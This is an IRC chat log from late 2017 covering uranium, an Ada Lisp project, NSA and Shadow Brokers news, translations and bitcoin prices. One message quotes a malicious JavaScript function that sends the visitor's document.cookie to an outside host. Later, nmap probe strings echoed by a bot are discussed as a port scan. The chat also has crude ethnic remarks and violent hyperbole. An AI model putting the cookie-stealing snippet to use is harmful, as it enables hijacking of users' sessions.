surprised if you stopped with the commentary and just listed everything 1736787;1510521676;mircea_popescu;http://btcbase.org/log/2017-11-12#1736734 << not of uranium. ru dun have any, in the 50s stole froim romania, then got some via jews, nowadays... 1736788;1510521676;a111;Logged on 2017-11-12 19:56 asciilifeform: BingoBoingo: orig link is quite nonsensical tho : ru is ~exporter~ not importer of fissiles 1736789;1510521727;mircea_popescu;http://btcbase.org/log/2017-11-12#1736744 << this is a cheap and effectual way to "catalogue for sale". just panorama the spines. 1736790;1510521727;a111;Logged on 2017-11-12 19:59 trinque: asciilifeform: take a picture of the book spines before selling, for teh uneducated youf 1736791;1510522381;BingoBoingo;In other reading, it looks like Trump's successor could be Pol Pot https://identitydixie.com/2017/11/11/the-tennessee-statement-a-southern-nationalist-manifesto/ 1736792;1510522475;mircea_popescu;lel 1736793;1510522492;mircea_popescu;in even other alt-lulz, etc looks set to surpass eth. teh butty-hurty! 1736794;1510522574;BingoBoingo;This is bullish for Preperation-H coin 1736795;1510522603;mircea_popescu;is that the cure for herpes ? 1736796;1510522621;BingoBoingo;Nah, hemmorhoids 1736797;1510522630;BingoBoingo;Herpes is valtrex 1736798;1510523280;mircea_popescu;diana_coman wanna gimme odds on wer making a working foxybot module ? 1736799;1510523334;diana_coman;what's a working foxybot module? 1736800;1510523619;mircea_popescu;well, the market bot. 1736801;1510523985;davout;http://btcbase.org/log/2017-11-12#1736758 <<< good question 1736802;1510523985;a111;Logged on 2017-11-12 20:11 pete_dushenski: awww bch back down to 0.2 after hitting 0.35 last night. but who has any left ? hmm... 1736803;1510524008;diana_coman;quite high I'd say; dunno if it's odds or simply wishful thinking on my side though 1736804;1510524057;mircea_popescu;a really ? 1736805;1510524071;mircea_popescu;and in the latest "malware" seen in the wild, function go(){open(document.forms[6].action,MyWin);document.getElementById('pop').style.display='none';document.location.href='http://baikalqx.beget.tech/test/?t=popad4&coco='+document.cookie;} 1736806;1510524198;mircea_popescu;davout evidently, whosoever got it back to 2 neh. 1736807;1510527024;lobbes;BingoBoingo, I actually do have root on the VPSen I currently wield, but it would be nice to have my stuff on a box owned by someone I trust. Anyways, I'll keep my eyez to the logs as maths unfold 1736808;1510527359;asciilifeform;http://btcbase.org/log/2017-11-12#1736787 << ah hm iirc nao su did not stash u, it stashed pu -- and most of it 'sold' to usg in '90s for pennies 1736809;1510527359;a111;Logged on 2017-11-12 21:21 mircea_popescu: http://btcbase.org/log/2017-11-12#1736734 << not of uranium. ru dun have any, in the 50s stole froim romania, then got some via jews, nowadays... 1736810;1510527392;asciilifeform;( who mines u today ? and, gotta wonder, how -- i can't picture it outside of butugychag-style 'fat-powered' op ) 1736811;1510527506;asciilifeform;http://btcbase.org/log/2017-11-12#1736763 << at one time asciilifeform also naively thought 'u of md keeps 1mil b00ks for me!11' -- even paid a subscription fee. which then went up, and max b00k loan time went from 6mo to 3mo to 1mo... and went up again.. and the most recent insult, they abolished 80% of the contents of the library floor asciilifeform frequented 1736812;1510527506;a111;Logged on 2017-11-12 20:28 mircea_popescu: irl i held ~10k tomes at home + 1.5mn or so held by the univ library for me 1736813;1510527513;asciilifeform;( where they went ? unknown, prolly burned ) 1736814;1510527521;asciilifeform;made room for 'admin offices' 1736815;1510527570;asciilifeform;ohai spyked 1736816;1510527573;asciilifeform;wb 1736817;1510527620;spyked;hi! sorry for the radio silence. I've been working myself out of various irl swamps lately (still in progress). following in read-only mode though. 1736818;1510527771;*;spyked missed quite a lot while in read-only mode. glad to hear you enjoyed bucharest, asciilifeform. unexpected also. fortunately you didn't see it on weekdays. 1736819;1510527785;asciilifeform;i did see it on weekday lol 1736820;1510527791;asciilifeform;enjoyed timis far moar ftr. 1736821;1510527851;asciilifeform;( where, e.g., sidewalks can be walked on, rather than used as ad hoc orc parking lot ) 1736822;1510527887;spyked;I was firmly convinced your verdict would be "~shithole" (at least mircea_popescu's was some years ago). 1736823;1510527902;asciilifeform;bucharest ? 1736824;1510527906;spyked;yes 1736825;1510527913;asciilifeform;it's still a notch or two ahead of, e.g., chicago 1736826;1510527918;asciilifeform;and for that matter most of usa 1736827;1510527933;asciilifeform;at least written in terms of 'bang per buck' 1736828;1510527982;asciilifeform;and the parts of usa that it ~isn't~ two notches ahead of, asciilifeform will never live in 1736829;1510527988;asciilifeform;so it's still a winner. 1736830;1510528047;spyked;in other news, I've been using most of my spare cycles lisping in ada. should be able to wrap up a blog post sharing a very minimal prototype (sane implem. of repl doing nothing but basic ops) in a few weeks. what I've got now adheres to most of ffa constraints. the current version isn't very clean, but getting there... 1736831;1510528061;asciilifeform;spyked: nifty 1736832;1510528067;asciilifeform;tinyscheme-like item as discussed here ? 1736833;1510528093;spyked;yes. hopefully more than that in the long term (item to be manually translated to e.g. fpga implementation) 1736834;1510528098;asciilifeform;sounds like fun 1736835;1510528132;asciilifeform;http://btcbase.org/log/2017-11-12#1736759 << linked item is unpleasantly reminiscent of the 'artificially smoked' sprats that flooded the market in the early 2000s 1736836;1510528132;a111;Logged on 2017-11-12 20:22 pete_dushenski: and in other shortcuts, https://phys.org/news/2017-11-year-malt-whisky-weeks-chemistry.html 1736837;1510528198;asciilifeform;spyked: my original notion was, sane ecosystem is direly short of a simple scripting lang 1736838;1510528222;asciilifeform;( i'd quite like to perma-anathemize python,perl,all the multi-GB-pots-of-liquishit ) 1736839;1510528253;asciilifeform;and get something in which one might write things like http://www.loper-os.org/?p=1762 1736840;1510528262;asciilifeform;but that ~itself~ weighs very little 1736841;1510528286;asciilifeform;and is 'correct-by-obviousness' 1736842;1510528316;spyked;I'm also keeping the idea of potentially embedding in other ada projects (e.g. adacoin?) in mind. but so far wrestling the ffa aspects were enough of a challenge. oh, and there's no gc yet, the thing leaks memory like hell. but that's not its biggest problem. 1736843;1510528351;spyked;at least once it goes out of memory it will scream, unlike tinyscheme buffer overflows. 1736844;1510528366;asciilifeform;i'm not fully convinced that a scripting lang ~needs~ a gc 1736845;1510528380;asciilifeform;( if your script runs for long enough that it needs gc -- maybe it oughta instead be an actual proggy ? ) 1736846;1510528402;spyked;^ and if it does, should be easy to plug it in. 1736847;1510528441;asciilifeform;on sane iron, gc really oughta be part of the iron. but that's whole other thread. 1736848;1510528485;asciilifeform;spyked: consider posting your draft ( as asciilifeform posts his drafts occasionally ) 1736849;1510528493;asciilifeform;i'd much like to try it 1736850;1510528525;spyked;right now the thing does a whole lot of consing (e.g. even when parsing), to avoid using ada run-time. but yeah, not posted, I'm talking about ~non-existing item. 1736851;1510528538;asciilifeform;spyked: ideally you tell it on commandlinearg how much memory the script shot gets. and if it tries to cons 1 time too many, that's a eggog 1736852;1510528550;asciilifeform;( this is how 'p' works, as you will see in near future ) 1736853;1510528573;asciilifeform;spyked: it's ok to post it 1 routine at a time ( as i do with ffa ) 1736854;1510528581;spyked;asciilifeform, I considered doing that, but it's big enough (spread across 3-4 compilation units) that I'll need to wrap in blog post and do some preliminary documentation work 1736855;1510528610;asciilifeform;fair'nuff 1736856;1510528651;spyked;single routine is probably boring (I expect asciilifeform knows better than me how S-expr parsing works) 1736857;1510528700;spyked;though there's devil hiding in those details 1736858;1510528730;asciilifeform;parsing sanely (i.e. with meaningful eggog-recoveries) is tricky business 1736859;1510528795;spyked;e.g. ada I/O is not especially suited for this task, because it reads either characters or full lines; and reading characters doesn't eat newlines, so gotta rely on shell buffering for sane interaction. 1736860;1510528817;asciilifeform;your proggy should never try to eat or shit more than 1 char at a shot 1736861;1510528830;asciilifeform;i.e. it should be compatible with 'no os' ( bare iron ) microcontroller and such 1736862;1510528839;asciilifeform;ideally. 1736863;1510528849;asciilifeform;a newline is just another octet. 1736864;1510528922;spyked;on Get(Char), ada (at least gnat) seems to consume everything but linefeeds (even control characters such as EOT) 1736865;1510528927;asciilifeform;the less use is made of ada standard libs, the moar likely the thing is to survive transition to whatever ada-with-maximal-dross-jettisonned that we eventually end up with. 1736866;1510528948;*;spyked will keep this in mind 1736867;1510528959;asciilifeform;spyked: i'ma post 'p' i/o routines, 1s 1736868;1510529000;asciilifeform;from current draft : 1736869;1510529004;asciilifeform;os.ads : http://wotpaste.cascadianhacker.com/pastes/SRKeb/?raw=true 1736870;1510529011;asciilifeform;os.adb : http://wotpaste.cascadianhacker.com/pastes/C7D2r/?raw=true 1736871;1510529065;asciilifeform;and yes we import the c char routines. but these can be replaced on bare iron with reads/writes of uart, trivially. or anything else we want. 1736872;1510529091;spyked;asciilifeform, ty! I will study and put to use. 1736873;1510529094;asciilifeform;the posted unit is the entirety of the machine-dependent part of 'p'. 1736874;1510529154;asciilifeform;and for that matter of the ada std lib - using part ( once the debuggery put_line's in ffa are done away with ) 1736875;1510529287;*;spyked figures out he has a lot of work to do. but this -- after current code receives proper drilling from other interested people. 1736876;1510529549;asciilifeform;meanwhile, in other volkischer beobachter lulz, https://archive.is/NS8Mr >> 'Mr. Williams had written on his company blog about the Shadow Brokers... Now the group had replied in an angry screed on Twitter. It identified him — correctly — as a former member of the National Security Agency’s hacking group, Tailored Access Operations, or T.A.O., a job he had not publicly disclosed. Then the Shadow Brokers astonished him by droppi 1736877;1510529549;asciilifeform;ng technical details that made clear they knew about highly classified hacking operations that he had conducted' 1736878;1510529552;mircea_popescu;o hay there 1736879;1510529604;mircea_popescu;asciilifeform u is perfect fit for roboticized mining. very little by-hand mining done anymore anyway, but uranium mining led teh trade 1736880;1510529655;mircea_popescu;re library, time was 2week for general fund, and 1week for some specialized, and 1 day for particular stuff ; going down from there, was stuff you could only have 1hr at a time and waiting list >1month long. 1736881;1510529667;asciilifeform;'N.S.A. employees have been subjected to polygraphs and suspended from their jobs in a hunt for turncoats allied with the Shadow Brokers. Much of the agency’s cyberarsenal is still being replaced, curtailing operations' << gold 1736882;1510529667;mircea_popescu;all sorts of collections at bbu, incl 1600s printed matter. 1736883;1510529679;mircea_popescu;aww 1736884;1510529691;asciilifeform;get'em, get'em wreckerz!11! 1736885;1510529749;mircea_popescu;hey. this situatuion where usg is more transparent than fresh piss is not tenable. either it abolishes itself or fixes it 1736886;1510529756;mircea_popescu;but as things are now it's nothing short of ridiculous. 1736887;1510529777;asciilifeform;hey, while brick has wings 1736888;1510529777;mats;p transparent after OPM leak... 1736889;1510529821;mircea_popescu;a how's tricks mats 1736890;1510529873;mats;snore 1736891;1510529887;mircea_popescu;aww 1736892;1510529988;mircea_popescu;does an ada lisp ~even exist~ as far as anyone knows ? 1736893;1510530018;asciilifeform;mircea_popescu: spyked seems to have answered asciilifeform's thrown gauntlet and writing one 1736894;1510530030;asciilifeform;outside of this -- none published 1736895;1510530039;mircea_popescu;this could turn out into a pretty big deal. 1736896;1510530046;asciilifeform;( though the bolix shipped with the opposite, an adatron in zetalisp ) 1736897;1510530113;mircea_popescu;http://btcbase.org/log/2017-11-12#1736845 << this actually might be the perfect definition of the terms. "a program that doesn't need garbage collection is called a script ; a script that needs garbage collection is called a program". 1736898;1510530113;a111;Logged on 2017-11-12 23:13 asciilifeform: ( if your script runs for long enough that it needs gc -- maybe it oughta instead be an actual proggy ? ) 1736899;1510530121;asciilifeform;nao for the money shot from the lul, 'But he says no one from the N.S.A. has contacted him about being singled out publicly by the Shadow Brokers. “That feels like a betrayal,” he said. “I was targeted by the Shadow Brokers because of that work. I do not feel the government has my back.”' 1736900;1510530128;mircea_popescu;simple and sweet and i actually can't see what possible protestations are available. 1736901;1510530147;spyked;ohai mircea_popescu! 1736902;1510530185;mircea_popescu;spyked how far advanced is this thing ? 1736903;1510530209;mats;rebuilding massive intel apparatus after OPM-sized breaks is an unenviable task 1736904;1510530214;asciilifeform;'Some T.A.O. employees have been asked to turn over their passports, take time off their jobs and submit to questioning' 1736905;1510530249;mats;what can you even do? fire every remotely interesting guy and bus in tufts/harvard grads? 1736906;1510530250;spyked;mircea_popescu, so far, basic disconnected pieces: lispm cell representation, parser, evaler, implementation of +. 1736907;1510530259;mircea_popescu;mats much better task than trying to "reform" mediocre intel. 1736908;1510530263;mircea_popescu;here you just shoot everyone. 1736909;1510530265;spyked;need to connect them together and publish 1736910;1510530280;mircea_popescu;spyked pretty exciting. 1736911;1510530294;asciilifeform;mats: as it is, the ~marketable half of the iq bell curve, already resigned and went into 'contracts' 1736912;1510530307;mircea_popescu;mats there's no such thing as "fire" in this line. you, literally, shoot them. all. 1736913;1510530313;spyked;(and by publish I mean "item that is in sore need of a review") 1736914;1510530322;mats;mircea_popescu: not in america they don't. 1736915;1510530333;mircea_popescu;then not in america they don't have intel. 1736916;1510530337;asciilifeform;^ 1736917;1510530345;mircea_popescu;problem solved. /me submits his bill and goes back to yachting. 1736918;1510530371;asciilifeform;lolhey mircea_popescu back to sea again ?? 1736919;1510530388;mircea_popescu;asciilifeform on and off. i nearly got sun poisoning coupla days ago! 1736920;1510530408;mircea_popescu;the weather is so fucking perfect and the sun so pleasant you just dun realise it. slowroast, no burn but TOO MUCH D VITAMIN OMG 1736921;1510530408;asciilifeform;oh hah yer in range of usa's deozonation or whatever cone again aintcha. 1736922;1510530431;mircea_popescu;notrly, i dun think 1736923;1510530444;*;asciilifeform recalls c3 and ~week spent in the sun, and 0 burn 1736924;1510530461;asciilifeform;over here i get 20min and then begin to cook, even carry a dosimeter thing 1736925;1510530461;mircea_popescu;im not burned at all either. 1736926;1510530510;mircea_popescu;maybe this isn't how you call this in english. 1736927;1510530551;*;mats speculates next five-year plan includes thiel-ization of intel apparatus - booz allens and stratfors 1736928;1510530556;mircea_popescu;there's this condition, entirely metabolic, not dermatologic, resulting from overexposure (as in 6 hours) to sun. 1736929;1510530568;asciilifeform;'“Snowden killed morale,” another T.A.O. analyst said. “But at least we knew who he was. Now you have a situation where the agency is questioning people who have been 100 percent mission-oriented, telling them they’re liars.”' 1736930;1510530574;mircea_popescu;mostly D vitamin overload (nausea, lack of appetite, that sorta thing) 1736931;1510530579;spyked;ah! mircea_popescu (and possibly other folks interested in ro-en translations)! almost forgot: http://p.bvulpes.com/pastes/86l91/?raw=true <-- to drill. need to make 1-2 passes through it before sending to silviu gherman d00d. (been also watching his stuff, guy has grown on me!) 1736932;1510530586;asciilifeform;mircea_popescu: interesting, i had nfi this was a thing 1736933;1510530595;asciilifeform;possibly because i'd turn black long before changing vitamind overload 1736934;1510530604;mircea_popescu;it is. you get it in like, greek islands. sun too nice to burn but you do too much of it as a non-local 1736935;1510530671;mircea_popescu;asciilifeform not just d vitamin, either. but basically what happens is sun-driven metabolism overwhelms liver, products build up. solution is "not be such a noob", stuff fixes itself but after some practicve. 1736936;1510530735;asciilifeform;i have not yet had the pleasure of this disease. just as i have not yet suffered what the chukchas get from walrus-only diet in lean months etc 1736937;1510530739;mircea_popescu;spyked not bad. last line english ?> 1736938;1510530836;mircea_popescu;mats i'd rather bet next 5 years includes giving up on intel as given up on army, rely on foreign intel orgs. 1736939;1510530872;mircea_popescu;moved industry to china, moved army to afghanistanis, pakistanis, whoever else could be arsed, move intel to israel next and so on. 1736940;1510530887;asciilifeform;mircea_popescu: usg long ago gave up on intel in the traditional sense . e.g. nsa 'restaurant menu' consists ~100% of vulns they themselves created. 1736941;1510530893;asciilifeform;ditto signals gathering 1736942;1510530898;mircea_popescu;they indianselves created. 1736943;1510530944;mircea_popescu;spyked do you have an agreement in principle with the guy or anything though ? 1736944;1510531220;spyked;mircea_popescu, last line? also, no, haven't spoken to him. my idea was to just post this on blog and then ask him if he's willing to translate (refer log and so on). could also do it the other way around, not sure. 1736945;1510531245;mircea_popescu;in your paste, last line, "These would be, dear local investors, a few specific" 1736946;1510531271;mircea_popescu;and your idea is not good. first you talk to him in principle, then you do the script, then etc. cinema has a flow! 1736947;1510531353;*;spyked still doesn't get first question. 1736948;1510531387;mircea_popescu;spyked the romanian you pasted contains an english-language last line. 1736949;1510531406;spyked;not only the last line. 1736950;1510531428;mircea_popescu;oh it's dual. sorry, misread 1736951;1510531440;spyked;anyway. I was going to give the translation a shot either way, to work out translation muscle. 1736952;1510531514;mircea_popescu;a 1736953;1510531581;spyked;but will drop teleschpenker a line and ask him if he's interested. (also, his rates, if any. from my pov the text is public and so on, I'm not exactly in the translation profession) 1736954;1510531614;mircea_popescu;bwahahaha "The agency regarded as the world’s leader in breaking into adversaries’ computer networks failed to protect its own." what, is this from "the fake news site regarded (by itself) as the most influential item in the world, above even trilema, and staffed with people from the premiere (according to themselves) institution in the world" ? 1736955;1510531614;asciilifeform;linked item looks rather familiar -- ancient usenet meme 1736956;1510531623;mircea_popescu;next they're going to win the world series, these people. 1736957;1510531623;asciilifeform;( the cows thing ) 1736958;1510531641;mircea_popescu;asciilifeform can dig it up ? 1736959;1510531654;asciilifeform;could if dejanews were not nuked... 1736960;1510531661;mircea_popescu;i alwsays suspected that was an original english (or french) item stoletranslated to ro as the practice was at the time 1736961;1510531666;mircea_popescu;but never found original. 1736962;1510531669;asciilifeform;could easily originated from ro 1736963;1510531684;asciilifeform;(or any of the ancient fidonet countries) 1736964;1510531685;mircea_popescu;could, but i was unspecifically suspicious when first saw in 90s 1736965;1510531691;mircea_popescu;right. 1736966;1510531791;spyked;ftr, I got the idea starting from elaineo's thing (via http://btcbase.org/log/2017-10-01#1719047 ) 1736967;1510531791;a111;Logged on 2017-10-01 04:06 mircea_popescu: "If pet food companies used the same business model as startups: Jim creates a dog food factory and gives away dog food for free. 450 million dogs line up for free dog food. Purina Dog Chow understands that non-paying dog food consumers are currency, and buys Jim’s factory for $42 per dog." << in other historical elaineo lulz. 1736968;1510531808;mircea_popescu;a cool 1736969;1510531814;mircea_popescu;!~seen elaineo 1736970;1510531814;jhvh1;mircea_popescu: elaineo was last seen in #trilema 6 weeks, 0 days, 19 hours, 29 minutes, and 26 seconds ago: i do not 1736971;1510531822;mircea_popescu;i... wonder what she's up to. 1736972;1510531835;mircea_popescu;apparently this magic wand works so why noit shake it s`more :D 1736973;1510531992;mircea_popescu;meanwhile @ bed, bath & beyond, http://78.media.tumblr.com/9521cb92ecba1e8f4d6b866538baba4e/tumblr_nk8isoTok81tmr1tpo1_400.gif 1736974;1510532050;hanbot;spyked i lolled; also "use the remaining to produce milk for four cows." might be better stated as "use the remaining to produce four cows' worth of milk." or similar 1736975;1510532163;hanbot;also Goodbye or Good Afternoon might work better on the Bye of the British, somehow the shortening sounds yankee 1736976;1510532182;asciilifeform;oh hey it came back from the archives , mircea_popescu : 1736977;1510532187;mircea_popescu;o! 1736978;1510532242;asciilifeform;http://wotpaste.cascadianhacker.com/pastes/WXnXx/?raw=true 1736979;1510532256;mircea_popescu;when is this dated ? 1736980;1510532279;asciilifeform;my copy is aug of '91 1736981;1510532285;asciilifeform;so no later. 1736982;1510532289;mircea_popescu;this qualifies 1736983;1510532306;mircea_popescu;it'd appear then it was a seedling that grew up in the manner of folk productions 1736984;1510532346;asciilifeform;aha, likely 1736985;1510532352;asciilifeform;'homeric' 1736986;1510532358;mircea_popescu;iirc it was 1993 in ro 1736987;1510532462;mircea_popescu;T.A.O. operators must constantly renew their arsenal to stay abreast of changing software and hardware, examining every Windows update and new iPhone for vulnerabilities. “The nature of the business is to move with the technology,” a former T.A.O. hacker said. 1736988;1510532470;mircea_popescu;if only ants could speak they'd be no less entertaining. 1736989;1510532595;asciilifeform;http://btcbase.org/log/2017-11-13#1736975 << iirc mircea_popescu had a rhyme where 'a nagant's good to eat, dun ask why, bye' 1736990;1510532595;a111;Logged on 2017-11-13 00:16 hanbot: also Goodbye or Good Afternoon might work better on the Bye of the British, somehow the shortening sounds yankee 1736991;1510532645;mircea_popescu;"For decades after its creation in 1952, the N.S.A. — No Such Agency, in the old joke —" << check it out alf, teh times is retconning it into "an old joke" 1736992;1510532651;mircea_popescu;how fucking old is it, 2015 ? 1736993;1510532659;asciilifeform;eisenhower 1736994;1510532663;asciilifeform;believe or not. 1736995;1510532677;mircea_popescu;i missed all that. 1736996;1510532697;spyked;http://btcbase.org/log/2017-11-13#1736972 <-- I did follow in read-only mode. (and unfortunately suspecting that I will continue to do so until upcoming vacation, when I can start doing ~actual productive work) the principle being, I either read daily, or logs pile up and I fall continuously out of sync. (almost happened last weekend!) 1736997;1510532697;a111;Logged on 2017-11-13 00:10 mircea_popescu: apparently this magic wand works so why noit shake it s`more :D 1736998;1510532715;asciilifeform;( was a somewhat different animal before pc comp . split b/w actual signal-gathering , bug-plantin', supplying idjit hagelin crypto boxen to ~every major country, etc ) 1736999;1510532716;mircea_popescu;spyked lotta people have that same sufferance. 1737000;1510532747;spyked;http://btcbase.org/log/2017-11-13#1736974 <-- oh, thanks! :D /me makes changes 1737001;1510532747;a111;Logged on 2017-11-13 00:14 hanbot: spyked i lolled; also "use the remaining to produce milk for four cows." might be better stated as "use the remaining to produce four cows' worth of milk." or similar 1737002;1510532785;asciilifeform;iirc nsa was first publicly proclaimed by usg when marvin&mitchell escaped. 1737003;1510532802;asciilifeform;err, martin & mitchell. 1737004;1510532810;asciilifeform;1960. 1737005;1510532821;mircea_popescu;but i mean the "no such" specifically. 1737006;1510532829;hanbot;asciilifeform from http://trilema.com/2017/the-world-has-changed/ : "A Nagant's always good to keep nearby, don't wonder why. Bye." no britishness detectored 1737007;1510532850;asciilifeform;( was blamed, hilariously , on buggery. e.g. https://archive.is/P6A3B ) 1737008;1510532861;mircea_popescu;i recall that part. 1737009;1510532929;asciilifeform;hanbot: ah yea that was it 1737010;1510532950;spyked;speaking of which, that last "bye" is also part of the orig. thing (i.e. http://btcbase.org/log/2017-10-08#1722535 ). hopefully whoever does this also studies the original thing, the acting makes about half of it. 1737011;1510532950;a111;Logged on 2017-10-08 12:23 spyked: http://www.220.ro/umor-romanesc/Horatiu-Malaele-2-Vaci/nUSRHOCJEP/ <-- ro. only, unfortunately; also buried under piles of shitads, but I salvaged the videofile. 1737012;1510533013;asciilifeform;'The NSA immediately began searching for other sexual deviants in its ranks, eventually purging 26 employees suspected of being security risks because of their alleged "perversions."' prettygreat. 1737013;1510533169;mircea_popescu;reasoning by simile, the priviledge of dying empires. 1737014;1510533205;asciilifeform;'"Were they living today," quips author Bamford, "[they] would probably defect all over again."' (2007) 1737015;1510533224;asciilifeform;( bamford is the original -- and for some decades the only -- 'nsa biographer' ) 1737016;1510533310;mircea_popescu;in other lulz : 19BY2XCgbDe6WtTVbTyzM9eR3LYr6VitWK, the btc address printed on some "shadow brokers blog", got almost enough money for a small boat. 1737017;1510533322;mircea_popescu;if only they had the sense to be in the pizzeria line a few years ago! 1737018;1510533352;asciilifeform;very small boat 1737019;1510533473;mircea_popescu;https://archive.is/zNqEo << potential payout $19.81 (in 6 days). but unlike the http://btcbase.org/log/2017-11-12#1736478 "steemit" has a "whitepaper". and besides, the new york times doesn't pretend it doesn't exist. 1737020;1510533473;a111;Logged on 2017-11-12 16:12 mircea_popescu: !!withdraw 0.02 1GrvBXDT2XTnQ83yCsTZmqVtnZto223DkB 1737021;1510533520;asciilifeform;dafuq's that 1737022;1510533547;asciilifeform;ah it's the spamreddit with pay-per-click nonsense innit. 1737023;1510533562;mircea_popescu;asciilifeform i dunno, some random dorks "reinventing" some web or the other. 1737024;1510533567;mircea_popescu;EXCEPT THIS TIME ITS DIFFERENT 1737025;1510533677;mircea_popescu;just... the http://trilema.com/2014/namecheap-goes-off-the-deep-end-anyone-know-a-decent-domain-registrar/#selection-283.0-299.347 has to be underscored a little. so programming student made on the basis of market application over 20 minutes SIX TIMES what the shadow brokers made by posting for the general web public. 1737026;1510533695;mircea_popescu;sooner or later it gotta get through teh skulls that no, there's no "power in the multitudes". 1737027;1510533745;asciilifeform;waitasec someone answered that one and made a sane registrar ?! 1737028;1510533752;asciilifeform;or which programmingstudent 1737029;1510533768;mircea_popescu;namesilo.com 1737030;1510533773;mircea_popescu;quite satisfied 1737031;1510533800;mircea_popescu;asciilifeform http://btcbase.org/log/2017-11-12#1736465 << this one 1737032;1510533800;a111;Logged on 2017-11-12 15:57 wer: https://imgur.com/a/cU6e7 1737033;1510533820;asciilifeform;aaa you means specifically 'per 20 min' lol 1737034;1510533824;mircea_popescu;no. 1737035;1510533833;mircea_popescu;the shadow brokers wrote a post, with the shit they did. made them... 19.81 1737036;1510533839;mircea_popescu;chick wrote on her tits. made her... 1737037;1510533840;asciilifeform;19.81 > 0.02 1737038;1510533862;asciilifeform;and them titz are spent neh 1737039;1510533866;mircea_popescu;!~ticker --market all 1737040;1510533874;jhvh1;mircea_popescu: Bitstamp BTCUSD last: 5977.49, vol: 37755.02977619 | Bitfinex BTCUSD last: 5919.8, vol: 174730.02151193 | Kraken BTCUSD last: 5900.0, vol: 14520.3837052 | Volume-weighted last average: 5928.12836478 1737041;1510533878;mircea_popescu;!~calc 0.02 * 5928.12836478 1737042;1510533879;jhvh1;mircea_popescu: 0.02 * 5928.12836478 = 118.5625672956 1737043;1510533885;mircea_popescu;118.56 > 19.81. 1737044;1510533908;asciilifeform;aaaaa i misread the units 1737045;1510533914;asciilifeform;19.81 heathencoins wasnnit. 1737046;1510533922;mircea_popescu;yeah 1737047;1510533925;asciilifeform;tho wasn't there a 10btc earlier 1737048;1510533944;mircea_popescu;that was for the lifetime\ 1737049;1510533950;mircea_popescu;dudes been working since what, april 2016 ? 1737050;1510533986;mircea_popescu;conceivably SOME of that came other than "because we published in today's mp-wp clone-wannabe" 1737051;1510534019;mircea_popescu;(funny shit, too, wasn't "medium" gonna be IT last year ? now "steemit" ? next month "wegiveup", the "platform for america" ?) 1737052;1510534046;asciilifeform;they ought try a... say... fuckpigs.com 1737053;1510534053;mircea_popescu;too much work, fucking. 1737054;1510534061;asciilifeform;something that dun scream 'georgetown dc synthetic wine' 1737055;1510534065;mircea_popescu;stare-blank.ly, maybe. it's clever, like. 1737056;1510534103;asciilifeform;justshoot.me 1737057;1510534146;mircea_popescu;o hey! 1737058;1510534162;mircea_popescu;see, cuz then it could be cleverly JSM 1737059;1510534167;asciilifeform;something, anything, with moar imagination than the gods gave a gnat 1737060;1510534176;asciilifeform;jsm? 1737061;1510534197;asciilifeform;jew-supervised masonry? 1737062;1510534204;asciilifeform;japanese sado-masochism? 1737063;1510534213;mircea_popescu;jsm. could come with a handy "pronounciation guide", which the sort of tard outfits listing "evanghelist" and "at large" on their "Careers" page always include in their god-awful "phonetic" pigdin i mean peeg-deen 1737064;1510534220;mircea_popescu;!~google jism 1737065;1510534221;jhvh1;mircea_popescu: Jism (2003 film) - Wikipedia: ; Jism - Wikipedia: ; Urban Dictionary: jism: 1737066;1510534230;asciilifeform;jism - different matter, lel 1737067;1510534239;mircea_popescu;HOMOPHOBIC! 1737068;1510534243;mircea_popescu;i mean... HOMOPHONIC 1737069;1510534260;jhvh1;GET / HTTP/1.0 1737070;1510534262;mircea_popescu;b, n right next to each other. geddit ? it's ANOTHER joke. wrapped in a poon. 1737071;1510534264;jhvh1;OPTIONS / HTTP/1.0 1737072;1510534268;jhvh1;OPTIONS / RTSP/1.0 1737073;1510534269;asciilifeform;lolwaaat 1737074;1510534270;jhvh1;HELP 1737075;1510534273;jhvh1;GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0 1737076;1510534276;jhvh1;default 1737077;1510534279;jhvh1;OPTIONS sip:nm SIP/2.0 1737078;1510534286;asciilifeform;ahem 1737079;1510534288;mircea_popescu;this is prettygood... 1737080;1510534289;mircea_popescu;shinohai yo! 1737081;1510534290;ben_vulpes;lol well ratelimiting appears to work 1737082;1510534322;asciilifeform;!~google GET /nice%20ports%2C/Tri%6Eity.txt%2ebak 1737083;1510534323;jhvh1;asciilifeform: Re: More Service Detection notes: HTTP, FTP, DNS, etc: ; AppleTV & nmap -sV - Black Hills Information Security: ; linux - Rsyslogd Log entry about attack created by unknown ...: 1737084;1510534330;asciilifeform;ahahahahaha 1737085;1510534335;mircea_popescu;is this the bot being vulnerabilized ? 1737086;1510534337;mats;http://btcbase.org/log/2017-08-31#1707146 << lolno, combat lifesaver training doesn't even do iv bag insertion anymore 1737087;1510534337;a111;Logged on 2017-08-31 03:12 asciilifeform: hey mats did usg schutzstaffel corps teachya to set legs ? 1737088;1510534351;asciilifeform;mats: what do they teach ? how to humanely shoot ? 1737089;1510534353;mats;too many recruits fucking it up and getting people recycled to start 1737090;1510534358;mircea_popescu;mats cuz nobody wounded anymore, all work ~= adult diaper changes ? 1737091;1510534378;shinohai;o hai mats 1737092;1510534379;mats;also don't train to fight with bayonet anymore either 1737093;1510534383;asciilifeform;nowai 1737094;1510534392;asciilifeform;what are you expected to fight with if 0 ammo ? 1737095;1510534398;mats;literally never seen one in a supply cage in my entire service 1737096;1510534404;asciilifeform;( can't well fight with the plastic toy stock ) 1737097;1510534407;mircea_popescu;http://btcbase.org/log/2016-08-17#1523354 1737098;1510534407;a111;Logged on 2016-08-17 18:07 mircea_popescu: "bring my my brown pants" 1737099;1510534415;mats;buttstock p good at knocking a fucker out actually 1737100;1510534426;mats;i passed out after getting hit in formation the one time 1737101;1510534433;asciilifeform;do they have an aftermarket iron butt end or wat 1737102;1510534438;mircea_popescu;what if the fucker isn't in formation tho 1737103;1510534464;*;mircea_popescu seems to recall this is the problem the original english also encountered. "these colonists dun understand how fighting wars works!!" 1737104;1510534471;mats;dunno what its made of. 1737105;1510534518;mircea_popescu;asciilifeform honestly, i believe there's 0 expectation on the part of us army that anyone under that flag will ever fight again. "you wanna shoot, join the police wtf! army is for "assisting local combatants" 1737106;1510534561;asciilifeform;shinohai et al : http://seclists.org/nmap-dev/2006/q2/207 1737107;1510534586;asciilifeform;( i suspect you have open ports ) 1737108;1510534642;asciilifeform;as in, the 8000 or whatever that you apparently use to talk to the 'talker' , is unwittingly externally routed. 1737109;1510534642;jhvh1;GET / HTTP/1.0 1737110;1510534654;shinohai;ty asciilifeform 1737111;1510534664;asciilifeform;scan yer own box, shinohai , and see which. 1737112;1510534697;asciilifeform;( this is a good habit for everyday life, when standing up a box , i will note ) 